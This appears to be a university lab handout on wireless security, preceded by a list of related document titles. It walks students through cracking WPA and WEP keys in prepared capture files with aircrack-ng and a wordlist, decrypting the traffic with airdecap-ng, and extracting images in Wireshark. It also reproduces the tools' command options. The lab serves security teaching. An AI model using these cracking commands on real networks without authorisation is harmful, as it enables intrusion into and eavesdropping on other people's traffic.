CyberP3i Hands-on Lab Series

Similar documents
Gaining Access to encrypted networks

Section 4 Cracking Encryption and Authentication

Worldwide Release. Your world, Secured ND-IM005. Wi-Fi Interception System

Hacking Encrypted Wireless Network

Wireless Network Security

Wireless Security. Comp Sci 3600 Security. Attacks WEP WPA/WPA2. Authentication Encryption Vulnerabilities

Configuring the Client Adapter through the Windows XP Operating System

2013 Summer Camp: Wireless LAN Security Exercises JMU Cyber Defense Boot Camp

CyberP3i Hands-on Lab Series

SETTING UP THE LAB 1 UNDERSTANDING BASICS OF WI-FI NETWORKS 26

Sample Exam Ethical Hacking Foundation

Procedure: You can find the problem sheet on the Desktop of the lab PCs.

Missouri University of Science and Technology ACM SIG-Security 2014 Wi-Fi Workshop Exploitation Handbook

ETHICAL HACKING OF WIRELESS NETWORKS IN KALI LINUX ENVIRONMENT

Network Forensics (wireshark) Cybersecurity HS Summer Camp

Using aircrack and a dictionary to crack a WPA data capture

WPA Migration Mode: WEP is back to haunt you

Configuring the Client Adapter through the Windows XP Operating System

Hacking Wireless Networks by data

LevelOne. User Manual. WAP Mbps PoE Wireless AP V3.0.0

Configuring the Client Adapter through Windows CE.NET

WAP3205 v2. User s Guide. Quick Start Guide. Wireless N300 Access Point. Default Login Details. Version 1.00 Edition 2, 12/2012

EAPeak - Wireless 802.1X EAP Identification and Foot Printing Tool. Matt Neely and Spencer McIntyre

iconnect625w Copyright Disclaimer Enabling Basic Wireless Security

Wireless Setup Instructions for Windows

Security of WiFi networks MARCIN TUNIA

D. The bank s web server is using an X.509 certificate that is not signed by a root CA, causing the user ID and password to be sent unencrypted.

Configuring Repeater and Standby Access Points

On the left hand side of the screen, click on Setup Wizard and go through the Wizard.

WIRELESS EVIL TWIN ATTACK

This repository. Insights. Projects 0. Join GitHub today

WI-FI HUB+ TROUBLESHOOTING GUIDE

Wireless Access Point

Wireless Attacks and Countermeasures

Configuring a VAP on the WAP351, WAP131, and WAP371

Wireless Security Guide (for Windows XP, Windows Vista, Windows 7, Mac OSx)

Wi-Fi Settings Guide. Infrastructure Mode

CTF Workshop. Crim Synopsys, Inc. 1

WRE2206. User s Guide. Quick Start Guide. Wireless N300 Range Extender. Default Details. Version 1.00 Edition 1, 01/2015

Wireless Security Algorithms

Wireless Security Guide (for Windows XP, Windows Vista, Windows 7, Mac OSx)

LiteStation2 LiteStation5 User s Guide

BackTrack 5 Wireless Penetration Testing

Configuring Wireless Security Settings on the RV130W

Lab Using Wireshark to Examine Ethernet Frames

FinIntrusion Kit / Release Notes. FINFISHER: FinIntrusion Kit 4.0 Release Notes

Introduction to Wireshark

IP806GA/GB Wireless ADSL Router

NWD2705. User s Guide. Quick Start Guide. Dual-Band Wireless N450 USB Adapter. Version 1.00 Edition 1, 09/2012

Configuring Authentication Types

Tutorial: Simple WEP Crack

Nomadic Communications Labs

Configuring Layer2 Security

Nomadic Communications Labs. Alessandro Villani

Lab Using Wireshark to Examine Ethernet Frames

Click on Close button to close Network Connection Details. You are back to the Local Area Connection Status window.

Wireless KRACK attack client side workaround and detection

Activity Configuring and Securing a Wireless LAN in Packet Tracer

MP01 Quick Start Guide

LevelOne WBR User s Manual. 11g Wireless ADSL VPN Router. Ver

ETHICAL HACKING LAB SERIES. Lab 19: Using Certificates to Encrypt

What is Eavedropping?

User Module. WiFi SSID Switch APPLICATION NOTE

Security SSID Selection: Broadcast SSID:

Configuring the Client Adapter

Is Your Wireless Network Being Hacked?

5 Steps Wifi Hacking Cracking WPA2 Password

WPA Passive Dictionary Attack Overview

What is a Wireless LAN? The wireless telegraph is not difficult to understand. The ordinary telegraph is like a very long cat. You pull the tail in Ne

Lab Configure Basic AP security through GUI

Package Content IEEE g Wireless LAN USB Adapter... x 1 Product CD-ROM.x 1

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole" window. Now we must prep your wireless card.

HW/Lab 4: IPSec and Wireless Security. CS 336/536: Computer Network Security DUE 11 am on 12/01/2014 (Monday)

Configuring Repeater and Standby Access Points and Workgroup Bridge Mode

How to Configure Wireless Internet Access (Wi-Fi) Advanced Settings on the Qwest Standard Modem: Actiontec GT701-WG

BSc Year 2 Data Communications Lab - Using Wireshark to View Network Traffic. Topology. Objectives. Background / Scenario

How to configure a Point-to-Point link

802.11N Wireless ADSL Router

802.11N Wireless Broadband Router

808 N 5 th Street Alpine, TX Enabling Wireless on the Comtrend Modem

PePWave Mesh Connector User Manual

Today s challenge on Wireless Networking. David Leung, CISM Solution Consultant, Security Datacraft China/Hong Kong Ltd.

How to configure a Point-to-Multipoint link

Building a wireless capturing tool for WiFi

Learn How to Configure EnGenius Wi-Fi Products for Popular Applications

FEATURES HARDWARE CONNECTION

Content. Chapter 1 Product Introduction Package Contents Product Features Product Usage... 2

Wireless Printing Updated 10/30/2008 POLICY. The use of Wireless Networking is not permitted at any site for full client/server networking of Taxwise.

CHAPTER 7 ADVANCED ADMINISTRATION PC

WL-5420AP. User s Guide

Table of Contents. Page ii

How to set up your wireless network

Wireless Network Security

IP819VGA g ADSL VoIP Gateway

User Guide. 450Mbps/300Mbps Wireless N Access Point TL-WA901ND/TL-WA801ND REV

Lab - Using Wireshark to Examine a UDP DNS Capture

w w w.apc.com APC 3-in-1 Wireless Mobile Router User s Manual

Prestige 660H Series. Prestige 660HW Series

Lab - Using Wireshark to Examine a UDP DNS Capture

Wireless Access Point

Transcription:

CyberP3i Hands-on Lab Series Lab Series using NETLAB Designer: Dr. Lixin Wang, Associate Professor Hands-On Lab on Securing Wireless Networks The NDG Security+ Pod Topology Is Used

1. Introduction In this lab, students will decrypt WPA and WEP traffic and then analyze the 802.11 (wireless) packets. 2. Objectives Upon completion training of this lab, students will 1) be able to examine and decrypt WPA wireless traffic 2) be able to examine and decrypt WEP wireless traffic 3) be familiar with using the Wireshark tool 3. POD Topology 4. Lab Settings The information in the table below will be needed in order to log into the virtual machines used in this lab. The task section (Section 5) below provide details on the use of this information.

Pre-Lab Setup Before continuing to the tasks, log into the following system as instructed. For the virtual machine Kali: 1. On the login screen, select Other 2. When presented with the username, type root. Press Enter 3. When prompted for the password, type toor. Press Enter 4. Minimize the PC viewer window 5. Lab Instructions Part 1. Decrypt WPA traffic and analyze the 802.11 (wireless) packets 1) On the Kali virtual machine, open a terminal and type Wireshark. The Wireshark program will open 2) On the Wireshark window, click File Open, the Open Capture File window opens 3) Select the File System on the left pane, then navigate to the directory tmp/captures on the right pane 4) Select the file WPA-01.cap and then click Open on the bottom of the window 5) In the Filter pane of the Wireshark window, type http and then click Apply. You cannot see any traffic because the wireless traffic is encrypted 6) Next we decrypt the capture file WPA-01.cap using the network software suite Aircrack-ng with the option -w to set the WPA cracking path to a wordlist file named passlist under the directory /tmp/wordlists. You may also use - without the quotes for standard input (stdin) 7) Change the focus to the terminal and run the following command Aircrack-ng /tmp/captures/wpa01-cap -w /tmp/wordlists/passlist 8) The Extended Service Set Identification (ESSID) is one of two types of Service Set Identification (SSID).

9) For Index of target network? Type 2 for the network with the ESSID boguswifi. Since no valid WPA handshakes found, the result is listed below 10) Change the focus to the terminal and run the following command Aircrack-ng /tmp/captures/wpa01-cap -w /tmp/wordlists/passlist 11) For Index of target network? Type 5 for the network with the ESSID T4QY4. Since no valid WPA handshakes found again, the result is the same as above 12) Change the focus to the terminal and run the following command Aircrack-ng /tmp/captures/wpa01-cap -w /tmp/wordlists/passlist 13) For Index of target network? Type 7 for the network with the ESSID Anthony98. Since no data packets obtained from this network, the result is shown below

14) Change the focus to the terminal and run the following command Aircrack-ng /tmp/captures/wpa01-cap -w /tmp/wordlists/passlist 15) For Index of target network? Type 3 for the network with the ESSID TOWSON333. Since there is one valid WPA handshake found in this case, the WPA passphrase is obtained as shown below 16) Decrypt the 802.11 traffic for the wireless network TOWSON333. Type the command below to decrypt the traffic Airdecap-ng /tmp/captures/wpa01-cap -e TOWSON333 -p breezeless 17) Airdecap-ng is a network software suite that can decrypt WEP/WPA/WPA2 capture files. As well, it can also be used to remove the wireless headers from an unencrypted wireless capture. It outputs a new file ending with -dec.cap which is the decrypted version of the input capture file

18) Total number of decrypted WPA data packets is 11401. 19) Navigate to the /tmp/captures directory and then select the file WPA-01-dec.cap 20) In the Filter pane on the Wireshark window, type http and then click Apply 21) Select the File menu option and navigate to Export Objects HTTP 22) A new window appears. Browser through the list and examine the image files downloaded. Find the packet with packet number 4860 and select it. Click the Save As button on the bottom 23) Accept the default and save the file in the directory /tmp/captures. Then click Save 24) View the image file by selecting the Places menu option from the top menu pane and click Recent Documents, and the select the file wireless-network-new-5.jpg. The result is shown below

25) Repeat the process from step 21 to 24 by selecting the packet number 10232, and save the file in the directory /tmp/captures. You can view the image file by selecting the Places menu option from the top menu pane and click Recent Documents, the result is shown below

Part 2. Decrypt WEP traffic and analyze the 802.11 (wireless) packets 1) On the Kali virtual machine, open a terminal and type Wireshark. The Wireshark program will open 2) On the Wireshark window, click File Open, the Open Capture File window opens 3) Select the File System on the left pane, then navigate to the directory tmp/captures on the right pane 4) Select the file WEP1.cap and then click Open on the bottom of the window 5) In the Filter pane of the Wireshark window, type http and then click Apply. You cannot see any traffic because the wireless traffic is encrypted 6) Next we decrypt the capture file WEP1.cap using the network software suite Aircrack-ng 7) Change the focus to the terminal and run the following command Aircrack-ng /tmp/captures/wep1.cap 8) The result is shown below 9) For Index of target network? Type 1 for the network with the ESSID HUANGDOM. The decryption for this network fails and the result is shown below

10) Change the focus to the terminal and run the following command Aircrack-ng /tmp/captures/wep1.cap 11) For Index of target network? Type 2 for the network with the ESSID RP7J4. The decryption for this network fails and the result is shown below 12) Change the focus to the terminal and run the following command Aircrack-ng /tmp/captures/wep1.cap 13) For Index of target network? Type 5 for the network with the ESSID TOWSON333. The decryption for this network succeeded. The Aircrack-ng program can crack the 64-bit WEP encryption key

14) After the WEP encryption key is obtained, decrypt the network traffic with the Airdecap-ng program. 15) Change the focus to the terminal and run the following command Airdecap-ng -w AA:AA:AA:AA:AA /tmp/captures/wep1.cap 16) The decryption process is successful and totally 43220 WEP packets are decrypted 17) On the Wireshark window, click File Open, the Open Capture File window opens 18) Select the File System on the left pane, then navigate to the directory tmp/captures on the right pane 19) Select the file WEP1-dec.cap and then click Open on the bottom of the window 20) In the Filter pane of the Wireshark window, type http and then click Apply. Now you can see the HTTP requests within the 802.11 traffic because the WEP traffic has been decrypted using the program airdecap-ng 21) Select the File menu option and navigate to Export Objects HTTP 22) A new window appears. Browser through the list and examine the image files downloaded. Find the packet with packet number 238 and select it. Click the Save As button on the bottom 23) Accept the default and save the file in the directory /tmp/captures. Then click Save

24) View the image file by selecting the Places menu option from the top menu pane and click Recent Documents, and the select the file los-angeles-downtown-45.4.jpg. The result is shown below 25) Repeat the steps from 21 to 24 for the packet number 256 and save the file in the directory /tmp/captures. and save the file in the directory /tmp/captures. You can view the image file by selecting the Places menu option from the top menu pane and click Recent Documents, and the select the file Hampton-inn-los-angeles.jpg. The result is shown below

6. References Security+ Lab Series in NDG NETLAB+: Lab 4 Secure Implementation of Wireless Networking 7. Appendix In this appendix, we introduce the two network software suites Aircrack-ng and Airdecap-ng used in this lab. 7.1. Aircrack-ng Aircrack-ng is a network software suite consisting of a detector, packet sniffer, WEP and WPA/WPA2-PSK (pre-shared key) key cracking program and analysis tool for 802.11 wireless LANs. Aircrack-ng can recover the WEP key once enough encrypted packets have been captured with airodump-ng. The aircrack-ng suite is part of the BackTrack distribution. Usage of Aircrack-ng aircrack-ng [options] <capture file(s)> Here's a summary of all available options: Option Param. Description -a amode Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK). -b bssid Long version - -bssid. Select the target network based on the access point's MAC address. -e essid If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden). -p nbcpu On SMP systems: # of CPU to use. This option is invalid on non-smp systems. -q none Enable quiet mode (no status output until the key is found, or not). -c none (WEP cracking) Restrict the search space to alpha-numeric characters only (0x20-0x7F). -t none (WEP cracking) Restrict the search space to binary coded decimal hex characters. -h none (WEP cracking) Restrict the search space to numeric characters (0x30-0x39) These keys are used by default in most Fritz!BOXes. -d start (WEP cracking) Long version debug. Set the beginning of the WEP key (in hex), for debugging purposes. -m maddr (WEP cracking) MAC address to filter WEP data packets. Alternatively, specify - m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network. -M number (WEP cracking) Sets the maximum number of ivs to use.

Option Param. Description -n nbits (WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128. -i index (WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index. -f fudge (WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelyhood of success. -H none Long version - -help. Output help information. -l file name (Lowercase L, ell) logs the key to the file specified. Overwrites the file if it already exists. -K none Invokes the Korek WEP cracking method. (Default in v0.x) -k korek (WEP cracking) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, -k 17 to disable each attack selectively. -p threads Allow the number of threads for cracking even if you have a non-smp computer. -r database Utilizes a database generated by airolib-ng as input to determine the WPA key. Outputs an error message if aircrack-ng has not been compiled with sqlite support. -x/-x0 none (WEP cracking) Disable last keybytes brutforce. -x1 none (WEP cracking) Enable last keybyte bruteforcing (default). -x2 none (WEP cracking) Enable last two keybytes bruteforcing. -X none (WEP cracking) Disable bruteforce multithreading (SMP only). -y none (WEP cracking) Experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs -u none Long form - -cpu-detect. Provide information on the number of CPUs and MMX support. Example responses to aircrack-ng - -cpu-detect are Nb CPU detected: 2 or Nb CPU detected: 1 (MMX available). -w words (WPA cracking) Path to a wordlist or - without the quotes for standard in (stdin). -z none Invokes the PTW WEP cracking method. (Default in v1.x) -P none Long version - -ptw-debug. Invokes the PTW debug mode. -C MACs Long version - -combine. Merge the given APs to a virtual one. -D none Long version - -wep-decloak. Run in WEP decloak mode. -V none Long version - -visual-inspection. Run in visual inspection mode. -1 none Long version - -oneshot. Run in oneshot mode. -S none WPA cracking speed test.

Option Param. Description -s none Show the key in ASCII while cracking -E file> (WPA cracking) Create EWSA Project file v3 -J file (WPA cracking) Create Hashcat Capture file 7.2. Airdecap-ng Airdecap-ng is a network software suite that can decrypt WEP/WPA/WPA2 capture files. As well, it can also be used to remove the wireless headers from an unencrypted wireless capture. It outputs a new file ending with -dec.cap which is the decrypted version of the input file. Usage of Airdecap-ng airdecap-ng [options] <pcap file> Option Parameter Description -l don't remove the 802.11 header -b bssid access point MAC address filter -k pmk WPA/WPA2 Pairwise Master Key in hex -e essid target network ascii identifier -p pass target network WPA/WPA2 passphrase -w key target network WEP key in hexadecimal Usage Examples The following removes the wireless headers from an open network (no WEP) capture: airdecap-ng -b 00:09:5B:10:BC:5A open-network.cap The following decrypts a WEP-encrypted capture using a hexadecimal WEP key: airdecap-ng -w 11A3E229084349BC25D97E2939 wep.cap The following decrypts a WPA/WPA2 encrypted capture using the passphrase: airdecap-ng -e 'the ssid' -p passphrase tkip.cap The Extended Service Set Identification (ESSID) is one of two types of Service Set Identification (SSID). In an ad hoc wireless network with no access points, the Basic Service Set Identification (BSSID) is used.

8. Review Questions 1) Should I use WPA2, WPA or WEP network encryption on my own 802.11 wireless LAN? 2) Why WPA is more secure than WEP? 3) What are security enhancements made on WPA2 over its predecessor WPA? 4) What is the program aircrack-ng used for? 5) What is the program airdecap-ng used for?

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback